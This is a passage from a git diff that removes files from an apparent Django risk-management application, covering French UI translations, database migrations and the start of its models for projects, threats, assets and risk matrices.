-msgstr "pour accéder à toutes les fonctionnalités." - -#: core/templates/registration/login.html:31 -msgid "Invalid Username or password" -msgstr "Nom d'utilisateur ou mot de passe invalide" - -#: core/templates/registration/login.html:54 -msgid "Login" -msgstr "Connexion" - -#: core/templates/registration/login.html:59 -msgid "Login with passkeys" -msgstr "Se connecter avec passkeys" - -#: core/templates/registration/login.html:64 -msgid "Forgot password?" -msgstr "Mot de passe oublié?" - -#: core/templates/registration/password_reset.html:20 -msgid "Password reset" -msgstr "Réinitialisation du mot de passe" - -#: core/templates/registration/password_reset.html:22 -msgid "" -"Forgotten your password? Enter your email address below, and we'll email " -"instructions for setting a new one." -msgstr "" -"Vous avez oublié votre mot de passe ? Entrez votre adresse électronique ci-" -"dessous, et nous vous enverrons les instructions pour en définir un nouveau." - -#: core/templates/registration/password_reset.html:30 -msgid "Email:" -msgstr "Adresse électronique :" - -#: core/templates/registration/password_reset.html:37 -msgid "Send Email" -msgstr "Envoyer l'email" - -#: core/templates/registration/password_reset_complete.html:19 -msgid "Password reset complete" -msgstr "Réinitialisation du mot de passe terminée" - -#: core/templates/registration/password_reset_complete.html:21 -msgid "Your password has been set. You may go ahead and" -msgstr "Votre mot de passe a été défini. Vous pouvez" - -#: core/templates/registration/password_reset_complete.html:21 -msgid "log in" -msgstr "vous connecter" - -#: core/templates/registration/password_reset_complete.html:21 -msgid "now." -msgstr "maintenant." - -#: core/templates/registration/password_reset_confirm.html:40 -msgid "Reset password" -msgstr "Réinitialiser le mot de passe" - -#: core/templates/registration/password_reset_done.html:19 -msgid "Password reset sent" -msgstr "Réinitialisation du mot de passe envoyée" - -#: core/templates/registration/password_reset_done.html:21 -msgid "" -"We've emailed you instructions for setting your password, if an account " -"exists with the email you entered. You should receive them shortly." -msgstr "" -"Nous vous avons envoyé les instructions pour définir votre mot de passe, si " -"un compte existe avec l'adresse électronique que vous avez entrée. Vous " -"devriez les recevoir sous peu." - -#: core/templates/registration/password_reset_done.html:21 -msgid "" -"If you don't receive an email, please make sure you've entered the address " -"you registered with, and check your spam folder." -msgstr "" -"Si vous ne recevez pas d'email, veuillez vous assurer que vous avez entré " -"l'adresse avec laquelle vous vous êtes enregistré, et vérifiez votre " -"répertoire spam." - -#: core/templates/registration/password_reset_email.html:37 -msgid "" -"We have received a password reset request for this email. Click below to " -"proceed:" -msgstr "" -"Nous avons reçu une demande de réinitialisation de mot de passe pour cet " -"email. Cliquez ci-dessous pour y procéder:" - -#: core/templates/registration/password_reset_email.html:41 -msgid "Reset my password" -msgstr "Réinitialiser mon mot de passe" - -#: core/templates/registration/password_reset_email.html:51 -msgid "" -"This link can only be used once. In case of an issue, go to your instance" -msgstr "" -"Ce lien ne peut être utilisé qu'une seule fois. Si vous rencontrez un " -"problème, allez sur votre instance " - -#: core/templates/registration/password_reset_email.html:52 -msgid "and request a new password reset" -msgstr "et demandez une autre réinitialisation de mot de passe" - -#: core/templates/snippets/associated_users_list_nested.html:7 -#: core/templates/snippets/users_list_nested.html:7 -msgid "Username" -msgstr "Nom d'utilisateur" - -#: core/templates/snippets/breadcrumbs.html:10 -msgid "Home" -msgstr "Accueil" - -#: core/templates/snippets/dual_bar_stacked.html:6 -msgid " \"Current: Very low\" " -msgstr " \"Courant: Très faible\" " - -#: core/templates/snippets/dual_bar_stacked.html:7 -msgid " \"Current: Low\" " -msgstr " \"Courant: Faible\" " - -#: core/templates/snippets/dual_bar_stacked.html:8 -msgid " \"Current: Medium\" " -msgstr " \"Courant: Moyen\" " - -#: core/templates/snippets/dual_bar_stacked.html:9 -msgid " \"Current: High\" " -msgstr " \"Courant: Élevé\" " - -#: core/templates/snippets/dual_bar_stacked.html:10 -msgid " \"Current: Very high\" " -msgstr " \"Courant: Très élevé\" " - -#: core/templates/snippets/dual_bar_stacked.html:11 -msgid " \"Residual: Very low\" " -msgstr " \"Résiduel: Très faible\" " - -#: core/templates/snippets/dual_bar_stacked.html:12 -msgid " \"Residual: Low\" " -msgstr " \"Résiduel: Faible\" " - -#: core/templates/snippets/dual_bar_stacked.html:13 -msgid " \"Residual: Medium\" " -msgstr " \"Résiduel: Moyen\" " - -#: core/templates/snippets/dual_bar_stacked.html:14 -msgid " \"Residual: High\" " -msgstr " \"Résiduel: Élevé\" " - -#: core/templates/snippets/dual_bar_stacked.html:15 -msgid " \"Residual: Very high\" " -msgstr " \"Résiduel: Très élevé\" " - -#: core/templates/snippets/modal/modal.html:62 -#: core/templates/snippets/modal/modal_about_mira.html:48 -msgid "Version:" -msgstr "Version :" - -#: core/templates/snippets/modal/modal.html:63 -#: core/templates/snippets/modal/modal_about_mira.html:49 -msgid "Build:" -msgstr "Build :" - -#: core/templates/snippets/modal/modal_about_mira.html:50 -msgid "Terms of use" -msgstr "Conditions générales d'utilisation" - -#: core/templates/snippets/modal/modal_action_form.html:3 -msgid "" -"This action cannot be undone. This will permanently affect the following " -"object: " -msgstr "" -"Cette action ne peut pas être annulée. Cela supprimera définitivement les " -"objets suivants : " - -#: core/templates/snippets/modal/modal_action_form.html:17 -#: core/templates/snippets/modal/modal_delete_form.html:18 -#: core/templates/snippets/modal/modal_import_library_form.html:16 -msgid "No, take me back" -msgstr "Non, revenir en arrière" - -#: core/templates/snippets/modal/modal_delete_form.html:3 -msgid "" -"This action cannot be undone. This will permanently delete the following " -"object: " -msgstr "" -"Cette action ne peut pas être annulée. Cela supprimera définitivement les " -"objets suivants : " - -#: core/templates/snippets/modal/modal_delete_form.html:4 -msgid "as well as any child object." -msgstr "ainsi que tous les objets enfants." - -#: core/templates/snippets/modal/modal_import_library_form.html:4 -#, python-format -msgid "" -"\n" -" Are you sure you want to import the following library: %(library)s?\n" -" " -msgstr "" -"\n" -" Êtes-vous sûr de vouloir importer la bibliothèque suivante : %(library)s?\n" -" " - -#: core/templates/snippets/modal/modal_text.html:11 -msgid "This role gives read access to selected projects and domains." -msgstr "" -"Ce rôle donne un accès en lecture aux projets et domaines sélectionnés." - -#: core/templates/snippets/modal/modal_text.html:16 -msgid "This role is like an auditor, and can also manage risk acceptances." -msgstr "" -"Ce rôle s'apparente à celui d'un auditeur et peut également gérer les " -"acceptations de risques." - -#: core/templates/snippets/modal/modal_text.html:21 -msgid "" -"This role gives read and write access to selected projects and domains. It " -"has also read access on global and domain objects." -msgstr "" -"Ce rôle donne un accès en lecture et en écriture à des projets et domaines " -"sélectionnés. Il a également un accès en lecture aux objets globaux et de " -"domaine." - -#: core/templates/snippets/modal/modal_text.html:26 -msgid "" -"This role gives full access to selected domains. Like an analyst, it has " -"also read access on global and domain objects." -msgstr "" -"Ce rôle donne un accès complet aux domaines sélectionnés. Comme un analyste, " -"il a également un accès en lecture aux objets globaux et de domaine." - -#: core/templates/snippets/modal/modal_text.html:31 -msgid "" -"This role has all permissions, specifically to manage project domains, users " -"and users rights." -msgstr "" -"Ce rôle dispose de toutes les autorisations, notamment pour gérer les " -"domaines de projet, les utilisateurs et les droits des utilisateurs." - -#: core/templates/snippets/modal/modal_text.html:36 -msgid "" -"No matrix loaded or enabled. If you have not at least one " -"enabled matrix in your database, you will not be able to create analyses." -msgstr "" -"Aucune matrice chargée ou activée. Si vous n'avez pas au " -"moins une matrice activée dans votre base de données, vous ne pourrez pas " -"créer d'analyses." - -#: core/templates/snippets/modal/modal_update_form.html:7 -msgid "Add Security Measure" -msgstr "Ajouter une mesure de sécurité" - -#: core/templates/snippets/mp_data.html:20 -msgid "Risk analysis seems to be empty. Measure Plan cannot be generated." -msgstr "" -"L'analyse de risque semble être vide. Le plan de mitigation ne peut pas être " -"généré." - -#: core/templates/snippets/mp_data.html:43 -msgid "No associated measure" -msgstr "Pas de mesure associée" - -#: core/templates/snippets/ra_data.html:18 -msgid "Audited by:" -msgstr "Auditée par :" - -#: core/templates/snippets/ra_data.html:19 -msgid "Status:" -msgstr "Statut :" - -#: core/templates/snippets/ra_data.html:20 -msgid "Draft" -msgstr "Brouillon" - -#: core/templates/snippets/ra_data.html:20 -msgid "Ready" -msgstr "Prêt" - -#: core/templates/snippets/ra_data.html:22 -msgid "Created at:" -msgstr "Création :" - -#: core/templates/snippets/ra_data.html:23 -msgid "Updated at:" -msgstr "Dernière mise à jour :" - -#: core/templates/snippets/ra_data.html:28 -msgid "Matrix:" -msgstr "Matrice :" - -#: core/templates/snippets/ra_data.html:44 -msgid "Matrix view" -msgstr "Vue matricielle" - -#: core/templates/snippets/ri_list_nested.html:28 -msgid "Suggested measures" -msgstr "Mesures suggérées" - -#: core/templates/snippets/risk_matrix.html:87 -msgid "Risk levels" -msgstr "Niveaux de risque" - -#: core/templates/snippets/treatment_progress_dual_bar.html:6 -msgid " \"Risk: open\" " -msgstr " \"Risque: ouvert\" " - -#: core/templates/snippets/treatment_progress_dual_bar.html:7 -msgid " \"Risk: mitigated\" " -msgstr " \"Risque: atténué\" " - -#: core/templates/snippets/treatment_progress_dual_bar.html:8 -msgid " \"Risk: accepted\" " -msgstr " \"Risque: accepté\" " - -#: core/templates/snippets/treatment_progress_dual_bar.html:9 -msgid " \"Risk: blocking\" " -msgstr " \"Risque: bloquant\" " - -#: core/templates/snippets/treatment_progress_dual_bar.html:10 -msgid " \"Measure: open\" " -msgstr " \"Mesure: ouverte\" " - -#: core/templates/snippets/treatment_progress_dual_bar.html:11 -msgid " \"Measure: in progress\" " -msgstr " \"Mesure: en cours\" " - -#: core/templates/snippets/treatment_progress_dual_bar.html:12 -msgid " \"Measure: on hold\" " -msgstr " \"Mesure: en attente\" " - -#: core/templates/snippets/treatment_progress_dual_bar.html:13 -msgid " \"Measure: done\" " -msgstr " \"Mesure: terminée\" " - -#: core/tests/test_helpers.py:65 core/tests/test_helpers.py:121 -msgid "Very Low" -msgstr " \"Très faible\" " - -#: core/tests/test_helpers.py:66 core/tests/test_helpers.py:122 -msgid "Low" -msgstr " \"Faible\" " - -#: core/tests/test_helpers.py:68 core/tests/test_helpers.py:124 -msgid "High" -msgstr " \"Élevé\" " - -#: core/tests/test_helpers.py:69 core/tests/test_helpers.py:125 -msgid "Very High" -msgstr " \"Très élevé\" " - -#: core/utils.py:27 core/utils.py:35 -msgid "Administrator" -msgstr "Administrateur" - -#: core/utils.py:28 core/utils.py:38 -msgid "Domain manager" -msgstr "Responsable de domaine" - -#: core/utils.py:29 core/utils.py:39 -msgid "Analyst" -msgstr "Analyste" - -#: core/utils.py:50 -msgid "French" -msgstr "" - -#: core/utils.py:51 -msgid "English" -msgstr "" - -#: core/views.py:235 -msgid "Risk acceptance: {} accepted with success!" -msgstr "Acceptation de risque: {} acceptée avec succés!" - -#: core/views.py:238 -msgid "Risk acceptance: {} rejected with success!" -msgstr "Acceptation de risque : {} rejetée avec succès!" - -#: core/views.py:241 -msgid "Risk acceptance: {} revoked with success!" -msgstr "Acceptation de risque : {} révoquée avec succès!" - -#: core/views.py:316 -msgid "" -"Welcome to MIRA! 👋
    Question or feedback? click here" -msgstr "" -"Bienvenue dans MIRA! 👋
    Question ou retour d'expérience? cliquez ici" - -#: core/views.py:321 -msgid "" -"Warning! You are not assigned to any group. Without a group you will not " -"have access to any functionality. Please contact your administrator." -msgstr "" -"Attention! Vous n'êtes assigné à aucun groupe. Sans groupe, vous n'aurez " -"accès à aucune fonctionnalité. Veuillez contacter votre administrateur." - -#: core/views.py:340 -msgid "" -"You have {} pending risk acceptance(s) waiting to be processed. Go to the " -"list of risk " -"acceptances to learn more." -msgstr "" -"Vous avez {} acceptation(s) de risque en attente de traitement. allez dans " -"la liste des acceptations de risque pour en savoir plus." - -#: core/views.py:363 -msgid "Please wait before requesting another password reset." -msgstr "" -"Veuillez patienter avant de demander une nouvelle réinitialisation de votre " -"mot de passe." - -#: core/views.py:368 -msgid "Mira: Password Reset" -msgstr "Mira: Réinitialisation de mot de passe" - -#: core/views.py:372 -msgid "An error has occured, please try later." -msgstr "Une erreur s'est produite, veuillez réessayer plus tard." - -#: core/views.py:383 -msgid "Invalid email or captcha." -msgstr "Email ou captcha invalide." - -#: core/views.py:811 -msgid "Add " -msgstr "Ajouter " - -#: core/views.py:1125 -msgid "" -"User groups {} - Auditors, {} - Validators, {} - Analysts and {} - Domain " -"Managers were created" -msgstr "" -"Les groupes d'utilisateurs {} - Auditeurs, {} - Validateurs, {} - Analystes " -"et {} - Responsables de domaine ont été créés" - -#: core/views.py:1722 core/views.py:1747 -msgid "Risk acceptance submitted to: " -msgstr "Acceptation de risque soumise à: " - -#: core/views.py:1793 -msgid "" -"Warning! You are not assigned to any group. Without a group you will not " -"have access to any functionality. Please contact you administrator." -msgstr "" -"Attention ! Vous n'êtes assigné à aucun groupe. Sans groupe, vous n'aurez " -"accès à aucune fonctionnalité. Veuillez contacter votre administrateur." - -#: core/views.py:1795 -msgid "Entry date" -msgstr "Date d'inscription" - -#: core/views.py:1795 -msgid "Superuser" -msgstr "Superutilisateur" - -#: core/views.py:1887 -msgid "User created and email send successfully." -msgstr "" -"L'utilisateur a été créé et le courrier électronique a été envoyé avec " -"succès." - -#: core/views.py:2034 -msgid "" -"Role assignment editing will be available in a future release. Currently you " -"have to attach users to groups to assign roles." -msgstr "" -"L'édition de l'attribution des rôles sera disponible dans une prochaine " -"version. Actuellement, vous devez attacher les utilisateurs à des groupes " -"pour leur attribuer des rôles." - -#~ msgid "{} residual risk level has not been assessed" -#~ msgstr "{} le niveau du risque résiduel n'a pas été évalué" - -#~ msgid "Contact (descending)" -#~ msgstr "Contact (descendant)" - -#, fuzzy -#~| msgid "Created" -#~ msgid "Creation" -#~ msgstr "Créée" - -#, fuzzy -#~| msgid "Threat (descending)" -#~ msgid "Creation (descending)" -#~ msgstr "Menace (descendant)" - -#~| msgid "Name" -#~ msgid "Name:" -#~ msgstr "Nom" - -#, fuzzy -#~| msgid "Description (descending)" -#~ msgid "Description:" -#~ msgstr "Description (descendant)" - -#~ msgid "Cloud instance" -#~ msgstr "Instance cloud" - -#~ msgid "Trial" -#~ msgstr "Version d'essai" - -#~ msgid "Standard" -#~ msgstr "Standard" - -#~ msgid "Matrix name" -#~ msgstr "Nom de la matrice" - -#~ msgid "Risk" -#~ msgstr "Risque" - -#~ msgid "Active" -#~ msgstr "Actif" - -#~ msgid "Yes, I accept:" -#~ msgstr "Oui, j'accepte:" diff --git a/core/migrations/0001_initial.py b/core/migrations/0001_initial.py deleted file mode 100644 index 0e12010..0000000 --- a/core/migrations/0001_initial.py +++ /dev/null @@ -1,170 +0,0 @@ -# Generated by Django 4.2 on 2023-05-03 08:03 - -from django.db import migrations, models -import uuid - - -class Migration(migrations.Migration): - - initial = True - - dependencies = [ - ] - - operations = [ - migrations.CreateModel( - name='Analysis', - fields=[ - ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)), - ('name', models.CharField(max_length=200, verbose_name='Name')), - ('description', models.TextField(blank=True, null=True, verbose_name='Description')), - ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Created at')), - ('version', models.CharField(blank=True, default='0.1', max_length=100, null=True, verbose_name='Version')), - ('is_draft', models.BooleanField(default=True, verbose_name='is a draft')), - ('updated_at', models.DateTimeField(auto_now=True)), - ], - options={ - 'verbose_name': 'Analysis', - 'verbose_name_plural': 'Analyses', - }, - ), - migrations.CreateModel( - name='Asset', - fields=[ - ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)), - ('name', models.CharField(max_length=200, verbose_name='Name')), - ('description', models.TextField(blank=True, null=True, verbose_name='Description')), - ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Created at')), - ('business_value', models.CharField(blank=True, max_length=200, verbose_name='business value')), - ('type', models.CharField(choices=[('PR', 'Primary'), ('SP', 'Support')], default='SP', max_length=2, verbose_name='type')), - ('is_published', models.BooleanField(default=True, verbose_name='published')), - ], - options={ - 'verbose_name': 'Asset', - 'verbose_name_plural': 'Assets', - }, - ), - migrations.CreateModel( - name='Project', - fields=[ - ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)), - ('name', models.CharField(max_length=200, verbose_name='Name')), - ('description', models.TextField(blank=True, null=True, verbose_name='Description')), - ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Created at')), - ('internal_reference', models.CharField(blank=True, max_length=100, null=True, verbose_name='Internal reference')), - ('lc_status', models.CharField(choices=[('undefined', '--'), ('in_design', 'Design'), ('in_dev', 'Development'), ('in_prod', 'Production'), ('eol', 'End Of Life'), ('dropped', 'Dropped')], default='in_design', max_length=20, verbose_name='Status')), - ], - options={ - 'verbose_name': 'Project', - 'verbose_name_plural': 'Projects', - }, - ), - migrations.CreateModel( - name='RiskAcceptance', - fields=[ - ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)), - ('name', models.CharField(max_length=200, verbose_name='Name')), - ('description', models.TextField(blank=True, null=True, verbose_name='Description')), - ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Created at')), - ('state', models.CharField(choices=[('created', 'Created'), ('submitted', 'Submitted'), ('accepted', 'Accepted'), ('rejected', 'Rejected'), ('revoked', 'Revoked')], default='created', max_length=20, verbose_name='State')), - ('expiry_date', models.DateField(help_text='Specify when the risk acceptance will no longer apply', null=True, verbose_name='Expiry date')), - ('updated_at', models.DateTimeField(auto_now=True, verbose_name='Updated at')), - ('accepted_date', models.DateTimeField(blank=True, null=True, verbose_name='Acceptance date')), - ('rejected_date', models.DateTimeField(blank=True, null=True, verbose_name='Rejection date')), - ('revoked_date', models.DateTimeField(blank=True, null=True, verbose_name='Revocation date')), - ('comments', models.CharField(blank=True, max_length=500, null=True, verbose_name='Comments')), - ], - options={ - 'verbose_name': 'Risk acceptance', - 'verbose_name_plural': 'Risk acceptances', - 'permissions': [('validate_riskacceptance', 'Can validate/rejected risk acceptances')], - }, - ), - migrations.CreateModel( - name='RiskMatrix', - fields=[ - ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)), - ('name', models.CharField(max_length=200, verbose_name='Name')), - ('description', models.TextField(blank=True, null=True, verbose_name='Description')), - ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Created at')), - ('json_definition', models.JSONField(default=dict, help_text='JSON definition of the matrix. See the documentation for more information.', verbose_name='JSON definition')), - ('is_enabled', models.BooleanField(default=True, help_text='If the matrix is set as disabled, it will not be available for selection for new risk analyses.', verbose_name='enabled')), - ], - options={ - 'ordering': ['name'], - 'abstract': False, - }, - ), - migrations.CreateModel( - name='RiskScenario', - fields=[ - ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)), - ('name', models.CharField(max_length=200, verbose_name='Name')), - ('description', models.TextField(blank=True, null=True, verbose_name='Description')), - ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Created at')), - ('existing_measures', models.TextField(blank=True, help_text='The existing security measures to manage this risk. Edit the risk scenario to add extra security measures.', max_length=2000, verbose_name='Existing measures')), - ('current_proba', models.SmallIntegerField(default=-1, verbose_name='Current probability')), - ('current_impact', models.SmallIntegerField(default=-1, verbose_name='Current impact')), - ('current_level', models.SmallIntegerField(default=-1, help_text='The risk level given the current measures. Automatically updated on Save, based on the chosen matrix', verbose_name='Current level')), - ('residual_proba', models.SmallIntegerField(default=-1, verbose_name='Residual probability')), - ('residual_impact', models.SmallIntegerField(default=-1, verbose_name='Residual impact')), - ('residual_level', models.SmallIntegerField(default=-1, help_text='The risk level when all the extra measures are done. Automatically updated on Save, based on the chosen matrix', verbose_name='Residual level')), - ('treatment', models.CharField(choices=[('open', 'Open'), ('mitigated', 'Mitigated'), ('accepted', 'Accepted'), ('blocker', 'Show-stopper'), ('transferred', 'Transferred')], default='open', max_length=20, verbose_name='Treatment status')), - ('updated_at', models.DateTimeField(auto_now=True, verbose_name='Updated at')), - ('comments', models.CharField(blank=True, max_length=500, null=True, verbose_name='Comments')), - ], - options={ - 'verbose_name': 'Risk scenario', - 'verbose_name_plural': 'Risk scenarios', - }, - ), - migrations.CreateModel( - name='SecurityFunction', - fields=[ - ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)), - ('name', models.CharField(max_length=200, verbose_name='Name')), - ('description', models.TextField(blank=True, null=True, verbose_name='Description')), - ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Created at')), - ('provider', models.CharField(blank=True, max_length=200, null=True, verbose_name='Provider')), - ('is_published', models.BooleanField(default=True, verbose_name='published')), - ], - options={ - 'verbose_name': 'Security function', - 'verbose_name_plural': 'Security functions', - }, - ), - migrations.CreateModel( - name='SecurityMeasure', - fields=[ - ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)), - ('name', models.CharField(max_length=200, verbose_name='Name')), - ('description', models.TextField(blank=True, null=True, verbose_name='Description')), - ('type', models.CharField(choices=[('n/a', 'N/A'), ('technical', 'Technical'), ('organizational', 'Organizational')], default='n/a', max_length=20, verbose_name='Type')), - ('status', models.CharField(choices=[('open', 'Open'), ('in_progress', 'In progress'), ('on_hold', 'On hold'), ('done', 'Done')], default='open', max_length=20, verbose_name='Status')), - ('eta', models.DateField(blank=True, help_text='Estimated Time of Arrival', null=True, verbose_name='ETA')), - ('link', models.CharField(blank=True, help_text='External url for action follow-up (eg. Jira ticket)', max_length=1000, null=True, verbose_name='Link')), - ('effort', models.CharField(blank=True, choices=[('S', 'Small'), ('M', 'Medium'), ('L', 'Large'), ('XL', 'Extra-Large')], help_text='Relative effort of the measure (using T-Shirt sizing)', max_length=2, null=True, verbose_name='Effort')), - ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Created at')), - ('updated_at', models.DateTimeField(auto_now=True, verbose_name='Updated at')), - ], - options={ - 'verbose_name': 'Security measure', - 'verbose_name_plural': 'Security measures', - }, - ), - migrations.CreateModel( - name='Threat', - fields=[ - ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)), - ('name', models.CharField(max_length=200, verbose_name='Name')), - ('description', models.TextField(blank=True, null=True, verbose_name='Description')), - ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Created at')), - ('provider', models.CharField(blank=True, max_length=200, null=True, verbose_name='Provider')), - ('is_published', models.BooleanField(default=True, verbose_name='published')), - ], - options={ - 'verbose_name': 'Threat', - 'verbose_name_plural': 'Threats', - }, - ), - ] diff --git a/core/migrations/0002_initial.py b/core/migrations/0002_initial.py deleted file mode 100644 index 49bfcc3..0000000 --- a/core/migrations/0002_initial.py +++ /dev/null @@ -1,110 +0,0 @@ -# Generated by Django 4.2 on 2023-05-03 08:03 - -from django.conf import settings -from django.db import migrations, models -import django.db.models.deletion -import iam.models - - -class Migration(migrations.Migration): - - initial = True - - dependencies = [ - ('iam', '0001_initial'), - migrations.swappable_dependency(settings.AUTH_USER_MODEL), - ('core', '0001_initial'), - ] - - operations = [ - migrations.AddField( - model_name='threat', - name='folder', - field=models.ForeignKey(default=iam.models.Folder.get_root_folder, on_delete=django.db.models.deletion.CASCADE, related_name='%(class)s_folder', to='iam.folder'), - ), - migrations.AddField( - model_name='securitymeasure', - name='folder', - field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='iam.folder', verbose_name='Domain'), - ), - migrations.AddField( - model_name='securitymeasure', - name='security_function', - field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='core.securityfunction', verbose_name='Security Function'), - ), - migrations.AddField( - model_name='securityfunction', - name='folder', - field=models.ForeignKey(default=iam.models.Folder.get_root_folder, on_delete=django.db.models.deletion.CASCADE, related_name='%(class)s_folder', to='iam.folder'), - ), - migrations.AddField( - model_name='riskscenario', - name='analysis', - field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.analysis', verbose_name='Analysis'), - ), - migrations.AddField( - model_name='riskscenario', - name='assets', - field=models.ManyToManyField(blank=True, help_text='Assets impacted by the risk scenario', to='core.asset', verbose_name='Assets'), - ), - migrations.AddField( - model_name='riskscenario', - name='security_measures', - field=models.ManyToManyField(blank=True, to='core.securitymeasure', verbose_name='Security measures'), - ), - migrations.AddField( - model_name='riskscenario', - name='threat', - field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.threat', verbose_name='Threat'), - ), - migrations.AddField( - model_name='riskmatrix', - name='folder', - field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='%(class)s_folder', to='iam.folder'), - ), - migrations.AddField( - model_name='riskacceptance', - name='folder', - field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='iam.folder', verbose_name='Domain'), - ), - migrations.AddField( - model_name='riskacceptance', - name='risk_scenarios', - field=models.ManyToManyField(help_text='Select the risk scenarios to be accepted, attention they must be part of the chosen domain', to='core.riskscenario', verbose_name='Risk scenarios'), - ), - migrations.AddField( - model_name='riskacceptance', - name='validator', - field=models.ForeignKey(blank=True, help_text='Risk owner and validator identity', max_length=200, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='Validator'), - ), - migrations.AddField( - model_name='project', - name='folder', - field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='iam.folder', verbose_name='Domain'), - ), - migrations.AddField( - model_name='asset', - name='folder', - field=models.ForeignKey(default=iam.models.Folder.get_root_folder, on_delete=django.db.models.deletion.CASCADE, related_name='%(class)s_folder', to='iam.folder'), - ), - migrations.AddField( - model_name='asset', - name='parent_assets', - field=models.ManyToManyField(blank=True, to='core.asset', verbose_name='parent assets'), - ), - migrations.AddField( - model_name='analysis', - name='auditor', - field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='Auditor'), - ), - migrations.AddField( - model_name='analysis', - name='project', - field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.project', verbose_name='Project'), - ), - migrations.AddField( - model_name='analysis', - name='rating_matrix', - field=models.ForeignKey(help_text='WARNING! After choosing it, you will not be able to change it', on_delete=django.db.models.deletion.PROTECT, to='core.riskmatrix', verbose_name='Rating matrix'), - ), - ] diff --git a/core/migrations/__init__.py b/core/migrations/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/core/models.py b/core/models.py deleted file mode 100644 index ae670bf..0000000 --- a/core/models.py +++ /dev/null @@ -1,538 +0,0 @@ -import uuid -from django.db import models -from django.core.exceptions import ValidationError -from mira import settings -from core.base_models import AbstractBaseModel -from iam.models import Folder, FolderMixin, RootFolderMixin -from openpyxl import load_workbook -import pandas as pd -import json -from django.urls import reverse, reverse_lazy -from django.utils.translation import gettext_lazy as _ -from datetime import date, datetime -from django.contrib.auth import get_user_model -from typing_extensions import Self -from django.utils.html import format_html - -User = get_user_model() - - -class Project(AbstractBaseModel): - PRJ_LC_STATUS = [ - ('undefined', _('--')), - ('in_design', _('Design')), - ('in_dev', _('Development')), - ('in_prod', _('Production')), - ('eol', _('End Of Life')), - ('dropped', _('Dropped')), - - ] - internal_reference = models.CharField(max_length=100, - null=True, blank=True, verbose_name=_("Internal reference")) - folder = models.ForeignKey( - Folder, on_delete=models.CASCADE, verbose_name=_("Domain")) - lc_status = models.CharField(max_length=20, default='in_design', - choices=PRJ_LC_STATUS, verbose_name=_("Status")) - - class Meta: - verbose_name = _("Project") - verbose_name_plural = _("Projects") - - def __str__(self): - return self.name - - -class Threat(AbstractBaseModel, RootFolderMixin): - - provider = models.CharField( - max_length=200, blank=True, null=True, verbose_name=_("Provider")) - - is_published = models.BooleanField(_('published'), default=True) - - class Meta: - verbose_name = _("Threat") - verbose_name_plural = _("Threats") - - def __str__(self): - return self.name - - -class Asset(AbstractBaseModel, RootFolderMixin): - class Type(models.TextChoices): - """ - The type of the asset. - - An asset can either be a primary or a support asset. - A support asset can be linked to another "parent" asset of type primary or support. - Cycles are not allowed - """ - PRIMARY = 'PR', _('Primary') - SUPPORT = 'SP', _('Support') - - business_value = models.CharField( - max_length=200, blank=True, verbose_name=_('business value')) - type = models.CharField( - max_length=2, choices=Type.choices, default=Type.SUPPORT, verbose_name=_('type')) - parent_assets = models.ManyToManyField( - 'self', blank=True, verbose_name=_('parent assets'), symmetrical=False) - is_published = models.BooleanField(_('published'), default=True) - - class Meta: - verbose_name_plural = _("Assets") - verbose_name = _("Asset") - - def __str__(self) -> str: - return str(self.name) - - - def is_primary(self) -> bool: - """ - Returns True if the asset is a primary asset. - """ - return self.type == Asset.Type.PRIMARY - - def is_support(self) -> bool: - """ - Returns True if the asset is a support asset. - """ - return self.type == Asset.Type.SUPPORT - - def ancestors_plus_self(self) -> list[Self]: - result = {self} - for x in self.parent_assets.all(): - result.update(x.ancestors_plus_self()) - return list(result) - - -class SecurityFunction(AbstractBaseModel, RootFolderMixin): - provider = models.CharField( - max_length=200, blank=True, null=True, verbose_name=_("Provider")) - is_published = models.BooleanField(_('published'), default=True) - - class Meta: - verbose_name = _("Security function") - verbose_name_plural = _("Security functions") - - def __str__(self): - return self.name - - -class RiskMatrix(AbstractBaseModel, FolderMixin): - json_definition = models.JSONField(verbose_name=_("JSON definition"), help_text=_("JSON definition of the matrix. \ - See the documentation for more information."), default=dict) - is_enabled = models.BooleanField(_('enabled'), default=True, help_text=_( - "If the matrix is set as disabled, it will not be available for selection for new risk analyses.")) - - @property - def is_used(self) -> bool: - return Analysis.objects.filter(rating_matrix=self).exists() - - @property - def analyses(self) -> list: - return Analysis.objects.filter(rating_matrix=self) - - @property - def projects(self) -> list: - return Project.objects.filter(analysis__rating_matrix=self).distinct() - - def parse_json(self) -> dict: - return json.loads(self.json_definition) - - def get_detailed_grid(self) -> list: - matrix = self.parse_json() - grid = [] - for row in matrix['grid']: - grid.append([item for item in row]) - return grid - - def render_grid_as_colors(self): - matrix = self.parse_json() - grid = matrix['grid'] - res = [[matrix['risk'][i] for i in row] for row in grid] - - return res - - def __str__(self) 